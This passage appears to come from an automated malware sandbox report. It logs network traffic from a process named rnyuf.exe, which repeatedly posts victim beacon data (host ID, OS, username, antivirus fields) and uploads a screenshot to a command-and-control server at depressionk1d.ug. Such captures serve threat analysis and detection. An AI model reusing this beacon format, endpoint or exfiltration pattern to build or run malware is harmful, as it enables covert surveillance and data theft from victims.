6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:15.113010883 CET11111INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          282192.168.2.450104178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:15.250423908 CET11112OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:15.277514935 CET11112INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:15 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          283192.168.2.450105178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:15.418986082 CET11113OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:15.445609093 CET11113INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:15 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          284192.168.2.450106178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:15.581774950 CET11114OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:15.608174086 CET11115INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:15 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          285192.168.2.450108178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:15.757513046 CET11225OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:15.783256054 CET11355INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:15 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          286192.168.2.450111178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:15.919476986 CET11643OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:15.945046902 CET11643INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:15 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          287192.168.2.450113178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:16.095906019 CET12799OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:16.123121023 CET13009INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:16 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          288192.168.2.450114178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:16.097812891 CET12808OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:16.097940922 CET12808OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:16.098207951 CET12818OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:16.098383904 CET12821OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:16.120924950 CET12975OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:16.120973110 CET12978OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:24:16.120981932 CET12979OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:24:16.121059895 CET12982OUTData Raw: e4 77 a7 cd 17 ba 17 2c 96 cc b2 74 b8 4f 47 a6 9d 20 ff 00 0b d3 04 cc 3b d3 d6 e1 c7 43 4e d4 df 41 5e aa ea 44 74 a9 87 4c 1a 89 b4 fb 85 3f 70 d5 f1 76 e3 bd 4a 97 8d de 8f 67 49 ec 1e d6 aa 32 4d ac c3 f8 0f e5 4d 31 38 ea a6 b7 85 da 9e ab
                          Data Ascii: w,tOG ;CNA^DtL?pvJgI2MM18NobvZ?-4Z?A_V}}j=Qvm*[?%')biHm&QQ:u)}JXV>~T)F1Shaq8p+IpH%:S AO
                          Nov 12, 2021 22:24:16.121109962 CET12985OUTData Raw: 8c 52 f9 c3 f8 51 45 17 64 ba 9e 45 41 1c a7 a2 13 f8 54 8b 6f 31 fe 1c 7d 6a 73 33 f6 c0 a6 99 1f fb c6 8d 49 e7 6c 05 ab 77 75 1f 8d 3c 5b a0 eb 27 e5 51 ee 3e b4 80 d3 b3 25 dd 96 36 40 a7 ef 13 4e df 0a f4 50 6a b6 68 a3 90 9b 16 85 d0 1f 75
                          Data Ascii: RQEdEATo1}js3Ilwu<['Q>%6@NPjhuU\^#,{~`4#7V'QG${*5<_[W/V.>Cd;1^!gGF=nl5}NPF;m)hV(\$|.<oZO7Z$dW
                          Nov 12, 2021 22:24:16.143724918 CET13256OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:24:16.143780947 CET13274OUTData Raw: 03 c5 28 3c d3 41 a5 26 98 ac 48 0d 3b 39 a8 f7 52 83 54 89 68 7e 69 41 a6 e6 8a a2 6c 48 0d 3b 35 18 a7 53 4c 96 87 e6 9d 9a 8f 34 a0 fb d5 5c 9b 12 03 4e 06 a2 06 9c 0d 32 5a 25 cd 00 d3 33 4a 1a 98 ac 49 9a 01 a6 73 4f 14 c9 b0 e1 52 2f 15 18
                          Data Ascii: (<A&H;9RTh~iAlH;5SL4\N2Z%3JIsOR/2.iY2,M54h<3<SsLICS3OwFX7TwR'}@;4L$*i<}89iAqBxZvO(n??3!T6PY?G:nf;r
                          Nov 12, 2021 22:24:16.191167116 CET13324INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:16 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          289192.168.2.450115178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:16.264164925 CET13619OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:16.290652990 CET13620INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:16 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          29192.168.2.449813178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:25.901081085 CET3561OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:25.901295900 CET3562OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:25.901679039 CET3572OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:25.902034998 CET3574OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:25.924485922 CET3577OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:25.925194025 CET3580OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:23:25.925421000 CET3591OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:25.925966024 CET3595OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:23:25.926276922 CET3597OUTData Raw: e4 77 a7 cd 17 ba 17 2c 96 cc b2 74 b8 4f 47 a6 9d 20 ff 00 0b d3 04 cc 3b d3 d6 e1 c7 43 4e d4 df 41 5e aa ea 44 74 a9 87 4c 1a 89 b4 fb 85 3f 70 d5 f1 76 e3 bd 4a 97 8d de 8f 67 49 ec 1e d6 aa 32 4d ac c3 f8 0f e5 4d 31 38 ea a6 b7 85 da 9e ab
                          Data Ascii: w,tOG ;CNA^DtL?pvJgI2MM18NobvZ?-4Z?A_V}}j=Qvm*[?%')biHm&QQ:u)}JXV>~T)F1Shaq8p+IpH%:S AO
                          Nov 12, 2021 22:23:25.926510096 CET3600OUTData Raw: 8c 52 f9 c3 f8 51 45 17 64 ba 9e 45 41 1c a7 a2 13 f8 54 8b 6f 31 fe 1c 7d 6a 73 33 f6 c0 a6 99 1f fb c6 8d 49 e7 6c 05 ab 77 75 1f 8d 3c 5b a0 eb 27 e5 51 ee 3e b4 80 d3 b3 25 dd 96 36 40 a7 ef 13 4e df 0a f4 50 6a b6 68 a3 90 9b 16 85 d0 1f 75
                          Data Ascii: RQEdEATo1}js3Ilwu<['Q>%6@NPjhuU\^#,{~`4#7V'QG${*5<_[W/V.>Cd;1^!gGF=nl5}NPF;m)hV(\$|.<oZO7Z$dW
                          Nov 12, 2021 22:23:25.947043896 CET3605OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:26.001612902 CET3671INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:25 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          290192.168.2.450116178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:16.420351982 CET13620OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:16.446151972 CET13621INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:16 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          291192.168.2.450117178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:16.575078011 CET13621OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:16.726001978 CET13622INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:16 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
